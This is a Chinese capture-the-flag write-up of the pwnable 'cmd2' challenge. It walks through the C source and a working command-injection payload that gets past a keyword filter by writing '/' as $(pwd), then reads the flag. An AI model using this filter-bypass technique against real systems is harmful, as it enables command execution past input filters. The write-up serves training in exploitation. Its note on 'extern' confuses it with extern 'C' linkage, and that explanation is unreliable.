cmd2 - pwnable
题目
这题是cmd1的升级版,直接运行无法运行程序的。就直接看源码吧~
pw:mommy now I get what PATH environment is for :)
分析
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}
可以看到过滤器中的过滤比上一题增加了。我们在cmd1中的payload为/bin/cat fla*
,在本题是不适用的。因为/
会触发过滤,关闭程序。
我们就需要利用bash中的命令替换构造新的payload。$()
和''
都是用作是命令替换的。命令替换与变量替换差不多,都是用来重组命令行的,先完成括号或单引号内的命令行,然后将其结果替换出来,再重组成新的命令行。
//exp
[root@localhost ~]# echo Linux `echo Shell $(echo today is $(date "+%Y-%m-%d"))`
Linux Shell today is 2017-11-07 ``和$()混合使用
payload 预期应该是:/bin/cat flag
。其中的flag,我们依然可以延续上题中的替换fla*
。那么现在任务就是转换为怎么替换/
。
我们需要用到linux的一样命令pwd
返回当前工作目录的绝对路径。如果我们在/
目录下,那么返回值就是/
。
我们现在有了基本思路,将工作目录切换到/
。利用pwd替换/。由于切换了工作目录,payload更新为:/bin/cat /home/cmd2/flag
最终替换后的payload应该为:$(pwd)home$(pwd)cmd2$(pwd)flag
cmd2@prowl:/$ /home/cmd2/cmd2 '$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)fla*'
$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)fla*
FuN_w1th_5h3ll_v4riabl3s_haha
cmd2@prowl:/$
注意:payload用单引号括起来。不能是双引号(cmd1中使用的是双引号)。因为这里的payload引用的是:内层命令被执行后的结果(即$(pwd)被替换为/),而双引号内层命令没用被执行过就传递给外层执行。
`` 和 $():引用命令被执行后的结果
补充知识
-
extern char** environ;
extern的作用是让 C++ 编译器将
extern "C"
声明的代码当作 C 语言代码处理,可以避免 C++ 因符号修饰导致代码不能和C语言库中的符号进行链接的问题。 -
memset(*p, 0, strlen(*p))
设置特定内存地址中值